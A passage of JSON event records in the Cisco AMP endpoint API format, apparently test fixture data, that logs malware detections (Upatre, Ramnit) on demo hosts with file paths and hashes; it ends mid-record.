-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":918000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":871000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":824000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704197","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":793000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704196","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":684000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704195","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":704000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594701","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":611000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594700","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707312705798000,"timestamp":1610704830,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:00:30+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1264,"scanned_processes":21,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899742001000,"timestamp":1610704828,"timestamp_nanoseconds":742000000,"date":"2021-01-15T10:00:28+00:00","event_type":"Microsoft Word compromise","event_type_id":1107296262,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704828,"start_date":"2021-01-15T10:00:28+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"caee8a2c599ad6e46ffdec5fabadc438af5c2ae5266d2c1e120269fffda6e426"},"parent":{"disposition":"Clean","identity":{"sha256":"b4234acf96fbe0e0feca317a1928afac05105b73556990d89f8a18563e1a3c65"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":589000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180331452157132817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":495000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132816","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":339000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132815","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132814","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132813","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132812","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132811","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":246000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132810","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":168000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132809","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":407000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758218","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Application 